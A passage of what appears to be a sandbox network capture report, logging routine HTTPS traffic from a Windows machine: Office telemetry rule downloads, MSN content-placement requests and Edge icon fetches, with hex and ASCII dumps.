2024-11-25 23:25:47 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	49869	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:47 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:47 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:47 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232547Z-174f78459685m244hC1EWRgp2c0000000ue00000000003ut x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:47 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:47 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:47 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:47 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: dce0685f-701e-001e-3f83-3ff5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232547Z-174f7845968zgtf6hC1EWRqd8s0000000mk00000000002tw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:47 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:47 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:48 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:48 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232548Z-174f7845968g6hv8hC1EWR1v2n00000002kg0000000003fg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:48 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:48 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:48 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 5810e7a8-301e-0000-3f91-3feecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232548Z-174f7845968ljs8phC1EWRe6en0000000ucg0000000004ng x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:48 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	49877	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	2610	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232545Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f05fe721de104a9a9ec2b60777f43cee&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-280815&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p= Cache-Control: no-cache MS-CV: y7MCjIAgcU2SEYAx.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:48 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2968 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: TYgL3SKOgQtQwYDNu9JJ/uf6BREsVthM30cMPIm5cnno7jn0mnLnXY90AweatCop/7/kvoHFBvYns/lVLrQa9OdONfO24KDOnioO+lkxohxdCLvDGe/F+OD+0mZ23qNDUgVT7Z7+b0/JB4/T12GWrGye+69umxdInUxShgozhcu+m14bzJETttdjrY+8w1zZx/V3q7y6siNnj3AP8iWoSKlviQzasSh5HfMF5TYligmHe5iz3ixvyDn5qM78n+iwC+yNyPK9+04/BaWRrkC8HL27ry/Ad54qUCA/6mWFwoB63c4hsnkT3ilewSqMd+PxrpeKkZtQanF0z3fZccj08w== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:48 UTC	2968	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	49878	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	2608	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232545Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=d4db4a4df9bf4405a59081ccfdb0fb26&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338388&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=531538185&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p= Cache-Control: no-cache MS-CV: y7MCjIAgcU2SEYAx.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-25 23:25:49 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2299 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: bGDBQE6olt6bagQ8puvQdGhC2U2FcdV2mgGoptdzhGsLCii36UzUHHPY6Uhjgr1Qf85A0cWPfVMqw4+RvMvGNToPTnZCcl83DiTK7MFzsDqqhPecgVVDJDx8H94+XwNRWK5dEDyvumWSNAdDiW2t6h+LI33/xrXaphZPy+5O08P/Zzbw6LVGulUucmRkhmaQBWet2xfOPcwtjy1W4SjfLTtR+fZvJIEsm0VttB2ZR9Pw6VLezPAErUi4mLKNmSEgMny7Ku6t1+bLUR/0VgbrbrqFXvrJ5hpYjP7+/RhoBQN98UdO6Q7ovH0HjsxQwc3hO8kDP8P0ph+l/GUOANAWrw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:49 UTC	2299	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.6	49881	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:49 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:49 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: 0fa3f0b7-901e-002d-4291-3febc7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232548Z-174f7845968n2hr8hC1EWR9cag0000000u700000000002m7 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:49 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.6	49880	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
